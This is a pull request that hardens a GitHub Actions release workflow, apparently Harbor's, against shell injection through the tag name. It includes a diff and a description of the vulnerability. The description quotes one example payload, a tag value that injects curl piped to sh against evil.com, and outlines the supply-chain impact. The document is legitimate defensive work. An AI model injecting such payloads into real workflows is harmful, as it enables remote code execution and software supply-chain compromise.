### PR TITLE
fix(security): harden GH Actions shell injection in publish_release

### DIFF
--- a/.github/workflows/publish_release.yml
+++ b/.github/workflows/publish_release.yml
@@ -15,10 +15,13 @@ jobs:
     steps:
       - uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
       - name: Setup env
+        env:
+          GH_REF_NAME: ${{ github.ref_name }}
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
         run: |
-          echo "CUR_TAG=${{ github.ref_name }}" >> $GITHUB_ENV
+          echo "CUR_TAG=$GH_REF_NAME" >> $GITHUB_ENV
           echo "BASE_TAG=$(cat ./VERSION)" >> $GITHUB_ENV
-          release=$(curl -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" -H "Accept: application/vnd.github.v3+json" https://api.github.com/repos/goharbor/harbor/releases/tags/${{ github.ref_name }})
+          release=$(curl -H "Authorization: token $GH_TOKEN" -H "Accept: application/vnd.github.v3+json" "https://api.github.com/repos/goharbor/harbor/releases/tags/$GH_REF_NAME")
           echo "BUILD_NO=$(echo $release | jq -r '.body' | jq -r '.buildNo')" >> $GITHUB_ENV
           echo "PRE_TAG=$(echo $release | jq -r '.body' | jq -r '.preTag')" >> $GITHUB_ENV
           echo "BRANCH=$(echo $release | jq -r '.target_commitish')" >> $GITHUB_ENV


### PR DESCRIPTION
## Summary
Hardens shell injection via `github.ref_name` in CNCF release workflow.

## Vulnerability
`.github/workflows/publish_release.yml:19,21` - direct `${{ github.ref_name }}` interpolation in `run: |`:
```yaml
release=$(curl ... https://api.github.com/repos/goharbor/harbor/releases/tags/${{ github.ref_name }})
```
Tag name is attacker-controlled (anyone with push tag permission -> many maintainers + compromised CI). Payload `v1.0"; curl https://evil.com | sh; echo "` breaks out.

Semgrep `run-shell-injection` (p/github-actions).

## Fix
Use `env:` indirection + quoted vars:
```yaml
env:
  GH_REF_NAME: ${{ github.ref_name }}
  GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
run: |
  release=$(curl -H "Authorization: token $GH_TOKEN" ... ".../tags/$GH_REF_NAME")
```
Also fixes token exposure on command line.

## Impact
- RCE on CNCF ubuntu runner with `contents: write, id-token: write, packages: write` -> attacker can push malicious Harbor images to ghcr.io, sign with cosign, steal AWS creds, modify release assets (supply chain RCE on millions of Harbor deployments).

Fixes CWE-88.
